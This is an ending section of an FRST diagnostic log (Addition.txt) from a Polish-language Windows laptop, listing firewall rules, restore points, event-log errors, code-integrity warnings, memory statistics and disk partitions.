C:\apps\jetbrains\webstorm 2016.1.3\bin\webstorm.exe FirewallRules: [TCP Query User{F32C4B4E-E344-486D-A157-DDD4F7ACFC7F}C:\apps\jetbrains\webstorm 2016.1.3\bin\webstorm.exe] => (Allow) C:\apps\jetbrains\webstorm 2016.1.3\bin\webstorm.exe FirewallRules: [UDP Query User{288B3626-B914-4BA8-AD08-906DEA81D6E9}K:\apps\smtp4dev\smtp4dev.exe] => (Allow) K:\apps\smtp4dev\smtp4dev.exe FirewallRules: [TCP Query User{189DFE49-E48D-42BB-B77D-163027D1F09E}K:\apps\smtp4dev\smtp4dev.exe] => (Allow) K:\apps\smtp4dev\smtp4dev.exe FirewallRules: [UDP Query User{70116E49-60F5-4F62-B83C-75BA0C337116}K:\xampp\php\php.exe] => (Allow) K:\xampp\php\php.exe FirewallRules: [TCP Query User{7543C085-2F19-4788-B579-8BA52E3F4230}K:\xampp\php\php.exe] => (Allow) K:\xampp\php\php.exe FirewallRules: [UDP Query User{C284D876-6694-4DFB-8A5D-146117F76CEC}C:\nodejs\node.exe] => (Allow) C:\nodejs\node.exe FirewallRules: [TCP Query User{C8293CCF-89DF-48B9-932E-001C5D411A96}C:\nodejs\node.exe] => (Allow) C:\nodejs\node.exe FirewallRules: [UDP Query User{07FFBDED-6B7F-4881-A37D-A48361105F00}K:\xampp\mysql\bin\mysqld.exe] => (Allow) K:\xampp\mysql\bin\mysqld.exe FirewallRules: [TCP Query User{58972126-8180-46FE-BA2B-19E86B6FED65}K:\xampp\mysql\bin\mysqld.exe] => (Allow) K:\xampp\mysql\bin\mysqld.exe FirewallRules: [UDP Query User{E8BE36E5-DBDD-47D4-A81E-04FA7370FE75}K:\xampp\apache\bin\httpd.exe] => (Allow) K:\xampp\apache\bin\httpd.exe FirewallRules: [TCP Query User{DB94370C-0633-4D3E-81F6-BC063A635672}K:\xampp\apache\bin\httpd.exe] => (Allow) K:\xampp\apache\bin\httpd.exe FirewallRules: [{042133F6-461A-4235-91A6-C45A21A66D26}] => (Allow) K:\Apps\Skype\Phone\Skype.exe FirewallRules: [{2E773C0F-22DD-4CCB-9C3D-F4A912BB4577}] => (Allow) K:\Apps\Steam\steamapps\common\Deus Ex Mankind Divided\retail\DXMD.exe FirewallRules: [{32AAC52D-00D1-47BD-9714-E0C338D77759}] => (Allow) K:\Apps\Steam\steamapps\common\Deus Ex Mankind Divided\retail\DXMD.exe FirewallRules: [{96C9EFEF-B2AB-4200-B9BC-17F74F8D3DC4}] => (Allow) K:\Apps\Steam\bin\cef\cef.win7\steamwebhelper.exe FirewallRules: [{F8A3E3D3-1F6D-44FF-B01E-1D56E6905BF6}] => (Allow) K:\Apps\Steam\bin\cef\cef.win7\steamwebhelper.exe FirewallRules: [{6AE538FE-F534-413F-9E18-4C8EF0B834BA}] => (Allow) K:\Apps\Steam\Steam.exe FirewallRules: [{B945D9F0-9B94-4363-A661-6C434A5F6440}] => (Allow) K:\Apps\Steam\Steam.exe FirewallRules: [{CD6DD8E2-CFFC-433C-8B0A-E70B00D071B3}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [{E0BF0AF1-95EE-4E58-8849-2023BB784D1F}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [{DB269B2A-1ACB-4330-A073-FACC67D40F98}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe FirewallRules: [{9379B8FE-8856-41E8-9159-55599ABC49A2}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe FirewallRules: [{785E16FA-7F0D-4773-AB96-7F24ADF33E48}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe FirewallRules: [{1A853DBC-1FFE-413C-9C31-F772E66DEC4B}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\outlook.exe FirewallRules: [UDP Query User{C902B24F-E138-41CE-B0CB-E53EBFD79F98}C:\apps\jetbrains\phpstorm 7.1.5\bin\phpstorm.exe] => (Allow) C:\apps\jetbrains\phpstorm 7.1.5\bin\phpstorm.exe FirewallRules: [TCP Query User{EF71E045-7BFC-4298-B456-D6D54F376CAB}C:\apps\jetbrains\phpstorm 7.1.5\bin\phpstorm.exe] => (Allow) C:\apps\jetbrains\phpstorm 7.1.5\bin\phpstorm.exe FirewallRules: [UDP Query User{E4AD4B42-2B2D-4470-AC0F-F423A8DAEDF4}C:\users\ami777\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\ami777\appdata\roaming\spotify\spotify.exe FirewallRules: [TCP Query User{2EA4E3F8-9A7E-4EC4-A5FB-DA1898B16600}C:\users\ami777\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\ami777\appdata\roaming\spotify\spotify.exe FirewallRules: [{6455B173-EE17-41AF-957B-0E7943DD72A4}] => (Allow) C:\Apps\MozillaFirefox\firefox.exe FirewallRules: [{6AB59671-6F6E-4A57-B356-52265CD6FF2B}] => (Allow) C:\Apps\MozillaFirefox\firefox.exe FirewallRules: [{A0BBD876-4DF2-4AFD-A043-7BF792D6B34A}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe FirewallRules: [{385D0555-E00F-4CFB-88A4-E683E4ED9BC9}] => (Allow) K:\Apps\Pinnacle\Studio 12\Programs\RM.exe FirewallRules: [{27E799BC-E4F6-425D-8546-B578563B705D}] => (Allow) K:\Apps\Pinnacle\Studio 12\Programs\RM.exe FirewallRules: [{9525EFB1-CABD-440F-A5CF-B81830C0B1A8}] => (Allow) K:\Apps\Pinnacle\Studio 12\Programs\Studio.exe FirewallRules: [{A5EBC1F5-CE37-4BB5-8D0C-5C2D946DC4B4}] => (Allow) K:\Apps\Pinnacle\Studio 12\Programs\Studio.exe FirewallRules: [{DF852BE4-1AF3-423B-8BF4-FD714CB151E5}] => (Allow) K:\Apps\Pinnacle\Studio 12\Programs\umi.exe FirewallRules: [{B506BF0A-C4E2-4692-85A1-BDE55550C6DC}] => (Allow) K:\Apps\Pinnacle\Studio 12\Programs\umi.exe FirewallRules: [{0A62856E-B604-43AB-A511-920D1ACD9280}] => (Allow) C:\WINDOWS\system32\rundll32.exe FirewallRules: [{582BCB32-D9F7-47A0-A26D-B0DF1AD565D7}] => (Allow) C:\Windows\System32\rundll32.exe FirewallRules: [{BC5B9838-CF81-4BFA-93F0-61D9D7DCCE58}] => (Allow) C:\Windows\System32\rundll32.exe FirewallRules: [TCP Query User{B16B4BA0-12BB-4830-B924-0CC3958ACF62}C:\apps\mozillafirefox\firefox.exe] => (Allow) C:\apps\mozillafirefox\firefox.exe FirewallRules: [UDP Query User{15A00B2E-B922-4AEF-9F31-9987043D34F6}C:\apps\mozillafirefox\firefox.exe] => (Allow) C:\apps\mozillafirefox\firefox.exe FirewallRules: [TCP Query User{FA3B45FF-4E85-4B62-A9B5-03B86872B323}K:\games\2k games\borderlands 2\binaries\win32\borderlands2.exe] => (Block) K:\games\2k games\borderlands 2\binaries\win32\borderlands2.exe FirewallRules: [UDP Query User{43F95EB9-FD8C-473C-A78D-0AE742B79810}K:\games\2k games\borderlands 2\binaries\win32\borderlands2.exe] => (Block) K:\games\2k games\borderlands 2\binaries\win32\borderlands2.exe FirewallRules: [{61D94B3A-D93E-4AEF-9BA4-F38532E51FAF}] => (Allow) C:\Windows\Prey\versions\1.6.8\bin\node.exe ==================== Punkty Przywracania systemu ========================= 29-04-2017 14:34:42 paint.net v4.0.16 08-05-2017 13:56:54 Zaplanowany punkt kontrolny 11-05-2017 21:20:16 Norton_Power_Eraser_20170511212015890 17-05-2017 09:37:26 Norton_Power_Eraser_20170517093726626 18-05-2017 20:47:43 Removed MuseScore 2 ==================== Wadliwe urządzenia w Menedżerze urządzeń ============= ==================== Błędy w Dzienniku zdarzeń: ========================= Dziennik Aplikacja: ================== Error: (05/19/2017 10:02:45 AM) (Source: Application Hang) (EventID: 1002) (User: ) Description: Program notepad++.exe w wersji 7.3.3.0 przestał współpracować z systemem Windows i został zamknięty. Aby sprawdzić, czy jest dostępnych więcej informacji na temat tego problemu, sprawdź historię problemu w oknie Zabezpieczenia i konserwacja w Panelu sterowania. Identyfikator procesu: 27b4 Godzina rozpoczęcia: 01d2d0763b794f92 Godzina zakończenia: 43 Ścieżka aplikacji: C:\Apps\Notepad++\notepad++.exe Identyfikator raportu: 3c3af627-cc53-4697-8f25-bb72e75d4a46 Pełna nazwa pakietu powodującego błąd: Identyfikator aplikacji względem pakietu powodującego błąd: Error: (05/19/2017 09:58:45 AM) (Source: VSS) (EventID: 8193) (User: ) Description: Błąd Usługi kopiowania woluminów w tle: nieoczekiwany błąd podczas wywoływania procedury QueryFullProcessImageNameW. hr = 0x80070006, Nieprawidłowe dojście. . Operacja: Wykonywanie operacji asynchronicznej Kontekst: Stan bieżący: DoSnapshotSet Error: (05/19/2017 09:58:31 AM) (Source: VSS) (EventID: 8194) (User: ) Description: Błąd Usługi kopiowania woluminów w tle: nieoczekiwany błąd podczas badania interfejsu IVssWriterCallback. hr = 0x80070005, Odmowa dostępu. . To jest często spowodowane przez niepoprawne ustawienia zabezpieczeń w procesie zapisującym lub żądającym. Operacja: Zbieranie danych modułu zapisującego Kontekst: Identyfikator klasy modułu zapisującego: {e8132975-6f93-4464-a53e-1050253ae220} Nazwa modułu zapisującego: System Writer Identyfikator wystąpienia modułu zapisującego: {a89b7e07-e6c6-4945-a49c-0bedb3cf5152} Error: (05/19/2017 09:38:49 AM) (Source: Application Hang) (EventID: 1002) (User: ) Description: Program firefox.exe w wersji 53.0.2.6333 przestał współpracować z systemem Windows i został zamknięty. Aby sprawdzić, czy jest dostępnych więcej informacji na temat tego problemu, sprawdź historię problemu w oknie Zabezpieczenia i konserwacja w Panelu sterowania. Identyfikator procesu: 104c Godzina rozpoczęcia: 01d2d07247b43f90 Godzina zakończenia: 22 Ścieżka aplikacji: C:\Apps\MozillaFirefox\firefox.exe Identyfikator raportu: df2064ff-82ac-4aa1-a955-b50393924306 Pełna nazwa pakietu powodującego błąd: Identyfikator aplikacji względem pakietu powodującego błąd: Error: (05/19/2017 09:35:36 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: AMI777-MSI) Description: Aktywacja aplikacji windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel nie powiodła się. Błąd: -2144927142. Więcej informacji można znaleźć w dzienniku Microsoft-Windows-TWinUI/Działa. Error: (05/18/2017 08:55:20 PM) (Source: Perflib) (EventID: 1008) (User: ) Description: Nie powiodło się wykonanie procedury otwierania dla usługi „BITS” w bibliotece DLL „C:\Windows\System32\bitsperf.dll”. Dane wydajności dla tej usługi nie będą dostępne. Pierwsze cztery bajty (DWORD) sekcji danych Data zawierają kod błędu. Error: (05/17/2017 10:06:21 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: AMI777-MSI) Description: Aktywacja aplikacji Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App nie powiodła się. Błąd: -2144927141. Więcej informacji można znaleźć w dzienniku Microsoft-Windows-TWinUI/Działa. Error: (05/12/2017 12:55:22 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: AMI777-MSI) Description: Aktywacja aplikacji Microsoft.BingWeather_8wekyb3d8bbwe!App nie powiodła się. Błąd: -2144927148. Więcej informacji można znaleźć w dzienniku Microsoft-Windows-TWinUI/Działa. Error: (05/12/2017 12:00:22 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: AMI777-MSI) Description: Aktywacja aplikacji Microsoft.BingWeather_8wekyb3d8bbwe!App nie powiodła się. Błąd: -2144927148. Więcej informacji można znaleźć w dzienniku Microsoft-Windows-TWinUI/Działa. Error: (05/12/2017 11:10:22 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: AMI777-MSI) Description: Aktywacja aplikacji Microsoft.BingWeather_8wekyb3d8bbwe!App nie powiodła się. Błąd: -2144927148. Więcej informacji można znaleźć w dzienniku Microsoft-Windows-TWinUI/Działa. Dziennik System: ============= Error: (05/19/2017 10:12:52 AM) (Source: NetBT) (EventID: 4321) (User: ) Description: Nie można zarejestrować nazwy „WORKGROUP :1d” w interfejsie o adresie IP 192.168.8.138. Komputer o adresie IP 192.168.8.151 nie zezwolił na przejęcie tej nazwy przez ten komputer. Error: (05/19/2017 10:12:30 AM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: Usługa SNARE zakończyła działanie; wystąpił następujący błąd: Nie można odnaleźć określonego modułu. Error: (05/19/2017 10:12:29 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi CldFlt z powodu następującego błędu: Żądanie nie jest obsługiwane. Error: (05/19/2017 10:12:01 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: ZARZĄDZANIE NT) Description: Nastąpiło nieoczekiwane zatrzymanie modułu rozszerzalności sieci WLAN. Ścieżka modułu: C:\WINDOWS\System32\IWMSSvc.dll Error: (05/19/2017 10:12:01 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: ZARZĄDZANIE NT) Description: Nastąpiło nieoczekiwane zatrzymanie modułu rozszerzalności sieci WLAN. Ścieżka modułu: C:\WINDOWS\System32\IWMSSvc.dll Error: (05/19/2017 10:11:59 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: ZARZĄDZANIE NT) Description: Nastąpiło nieoczekiwane zatrzymanie modułu rozszerzalności sieci WLAN. Ścieżka modułu: C:\WINDOWS\System32\IWMSSvc.dll Error: (05/19/2017 09:58:31 AM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Usługa Instalator modułów systemu Windows niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. W przeciągu 120000 milisekund zostanie podjęta następująca czynność korekcyjna: Uruchom usługę ponownie. Error: (05/19/2017 09:58:31 AM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Usługa Intel(R) Content Protection HECI Service niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. Error: (05/19/2017 09:58:31 AM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Usługa Usługa buforowania czcionek platformy Windows Presentation Foundation, wersja 3.0.0.0 niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. W przeciągu 0 milisekund zostanie podjęta następująca czynność korekcyjna: Uruchom usługę ponownie. Error: (05/19/2017 09:58:31 AM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Usługa Windows Search niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. W przeciągu 30000 milisekund zostanie podjęta następująca czynność korekcyjna: Uruchom usługę ponownie. CodeIntegrity: =================================== Date: 2017-05-19 10:12:25.534 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\drivers\cryptfd.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-05-19 09:51:14.105 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-05-19 09:22:04.462 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\drivers\cryptfd.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-05-19 00:00:37.179 Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Windows\System32\DriverStore\FileRepository\nvmii.inf_amd64_628e4569152ef83d\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2017-05-18 21:15:21.281 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\drivers\cryptfd.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-05-18 20:56:47.087 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\drivers\cryptfd.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-05-18 20:54:46.237 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\drivers\cryptfd.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-05-18 20:49:44.370 Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume5\Program Files\Nahimic\Nahimic2\UserInterface\x64\Nahimic2DevProps.dll that did not meet the Store signing level requirements. Date: 2017-05-18 20:49:44.367 Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume5\Program Files\Nahimic\Nahimic2\UserInterface\x64\Nahimic2OSD.dll that did not meet the Store signing level requirements. Date: 2017-05-18 20:49:44.297 Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume5\Program Files\Nahimic\Nahimic2\UserInterface\x64\Nahimic2DevProps.dll that did not meet the Store signing level requirements. ==================== Statystyki pamięci =========================== Procesor: Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz Procent pamięci w użyciu: 34% Całkowita pamięć fizyczna: 12194.96 MB Dostępna pamięć fizyczna: 8024.17 MB Całkowita pamięć wirtualna: 14050.96 MB Dostępna pamięć wirtualna: 9953.97 MB ==================== Dyski ================================ Drive c: (SSD) (Fixed) (Total:223.02 GB) (Free:148.53 GB) NTFS Drive k: (Dysk) (Fixed) (Total:931.25 GB) (Free:514.56 GB) NTFS ==================== MBR & Tablica partycji ================== ======================================================== Disk: 0 (Size: 931.5 GB) (Disk ID: 370F7A5E) Partition 1: (Not Active) - (Size=931.2 GB) - (Type=07 NTFS) ======================================================== Disk: 1 (Size: 223.6 GB) (Disk ID: A2F531EA) Partition: GPT. ==================== Koniec Addition.txt ============================